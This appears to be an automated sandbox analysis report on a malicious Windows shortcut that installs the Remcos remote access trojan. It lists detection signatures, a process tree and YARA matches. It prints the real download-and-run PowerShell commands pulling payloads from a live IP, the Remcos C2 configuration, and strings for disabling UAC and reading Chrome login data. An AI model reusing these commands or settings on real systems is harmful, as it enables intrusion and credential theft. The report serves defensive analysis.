Windows Analysis Report
Dlr7HYI6VL.lnk

Overview

General Information

Sample name: Dlr7HYI6VL.lnk
renamed because original name is a hash value
Original sample name: 383bec1808c99dcffafa9f4e03f104a4.lnk
Analysis ID: 1518489
MD5: 383bec1808c99dcffafa9f4e03f104a4
SHA1: 2f3647ea4331f7848de1c96cef6427b7136ab835
SHA256: be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850
Tags: lnk, user-abuse_ch
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 4072 cmdline: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1780 cmdline: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1584 cmdline: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6600 cmdline: powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6068 cmdline: cmd /c C:\Users\user\AppData\Roaming/hi.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 2024 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • cmd.exe (PID: 6412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4904 cmdline: powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
          • AUGUST.exe (PID: 5376 cmdline: C:\Users\user\AppData\Roaming/AUGUST.exe MD5: 25860926414BF43383246F7C773A8D6C)
            • DZIPR.exe (PID: 5660 cmdline: "C:\Users\user\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)
              • DZIPR.exe (PID: 992 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
                • cmd.exe (PID: 6600 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • explorer.exe (PID: 1460 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • svchost.exe (PID: 6980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • DZIPR.exe (PID: 4780 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 2720 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 5388 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • DZIPR.exe (PID: 2832 cmdline: "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4924 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown, Strings:
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown, Strings:
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
Source: 00000011.00000000.2322852163.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Author: Joe Security
Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Author: unknown, Strings:
  • 0x134b8:$a1: Remcos restarted by watchdog!
  • 0x13a30:$a3: %02i:%02i:%02i:%03i
Source: 24.2.cmd.exe.5862757.2.raw.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 24.2.cmd.exe.5862757.2.raw.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen, Strings:
  • 0x1d0be:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1d149:$s1: CoGetObject
  • 0x1d0a2:$s2: Elevation:Administrator!new:
Source: 24.2.cmd.exe.5861b57.3.raw.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 24.2.cmd.exe.5861b57.3.raw.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen, Strings:
  • 0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1dd49:$s1: CoGetObject
  • 0x1dca2:$s2: Elevation:Administrator!new:
Source: 26.2.explorer.exe.4e80757.5.raw.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security

                      System Summary

Source: File created, Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1780, TargetFilename: C:\Users\user\AppData\Roaming\hello.bat
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4072, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, ProcessId: 1780, ProcessName: powershell.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c C:\Users\user\AppData\Roaming/hi.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6068, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , ProcessId: 2024, ProcessName: wscript.exe
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1780, TargetFilename: C:\Users\user\AppData\Roaming\hello.bat
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 6980, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, ProcessId: 4072, ProcessName: cmd.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c C:\Users\user\AppData\Roaming/hi.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6068, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" , ProcessId: 2024, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4072, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat, ProcessId: 1780, ProcessName: powershell.exe
Source: Process started, Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 1460, ProcessName: explorer.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6980, ProcessName: svchost.exe
                      No Suricata rule has matched

                      AV Detection

Source: C:\Users\user\AppData\Local\Temp\gps, Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\demhwk, Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, Malware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Temp\demhwk, ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\gps, ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, ReversingLabs: Detection: 86%
Source: Dlr7HYI6VL.lnk, ReversingLabs: Detection: 15%
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\gps, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\demhwk, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Joe Sandbox ML: detected
Source: Dlr7HYI6VL.lnk, Joe Sandbox ML: detected
Source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_3a1bc7b9-5

                      Exploits

Source: Yara match, File source: Process Memory Space: DZIPR.exe PID: 5660, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
                      Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
                      Source: Binary string: msacm32.pdb source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
                      Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 00000010.00000003.2318798588.000000000278D000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.16.dr
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,16_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_00402B79
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA4748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,17_2_6FA4748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C51748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,18_2_6C51748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,23_2_6FAC748E
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
